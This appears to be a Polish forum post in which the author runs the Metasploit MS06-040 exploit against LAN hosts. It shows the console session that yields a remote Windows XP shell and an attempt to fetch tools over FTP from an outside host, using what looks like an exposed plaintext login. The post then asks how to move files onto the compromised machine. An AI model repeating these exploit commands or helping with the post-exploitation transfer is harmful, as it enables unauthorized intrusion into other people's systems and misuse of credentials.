wszystko działa, wszystko cacy, natomiast po wejsciu do w sumie gołego systemu problem jest następujący, nie ma nic, co umożliwiłoby łatwe proste i przyjemne ściągnięcie nań potrzebnych narzędzi.
Kod:
msf netapi_ms06_040(win32_bind) > set RHOST 10.0.10.170
RHOST -> 10.0.10.170
msf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows XP target[*] This will not work on SP2![*] Sending request...[*] The server rejected it, trying again...[*] This system may be patched or running Windows XP SP1 or SP2[*] RPC server responded with:[*] RESPONSE => response[*] STUB DATA = \x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7D\x00\x00\x00\x4B\x08\x00\x00[*] Exiting Bind Handler.
msf netapi_ms06_040(win32_bind) > unset RHOST
msf netapi_ms06_040(win32_bind) > set RHOST 10.0.8.63
RHOST -> 10.0.8.63
msf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows XP target[*] This will not work on SP2![*] Sending request...[*] The server rejected it, trying again...[*] Got connection from 10.0.9.4:54810 <-> 10.0.8.63:4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
no i jesteśmy... ale dalej...
spróbujmy sciągnąc coś z ftp...
Kod:
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ftp
ftp
open agregator.w.interia.pl
Uytkownik (agregator.w.interia.pl:(none)): agregator
m3f1st0f3l3s
dir
quit
chujwiecojeszcze ;-)
wynik jest taki sam - brak odpowiedzi od terminala, co mnie bardzo martwi... ;-)
dopiero po ctrl+c terminal reaguje:
Kod:
Caught interrupt, exit connection? [y/n] Dropping back to the console...
Caught interrupt, exit connection? [y/n] y[*] Exiting Bind Handler.
msf netapi_ms06_040(win32_bind) >
i tu leży właśnie istota problemu: jak ściągnąc coś ze zdalnego komputera, używając konsoli wygenerowanej przez metasploit'y?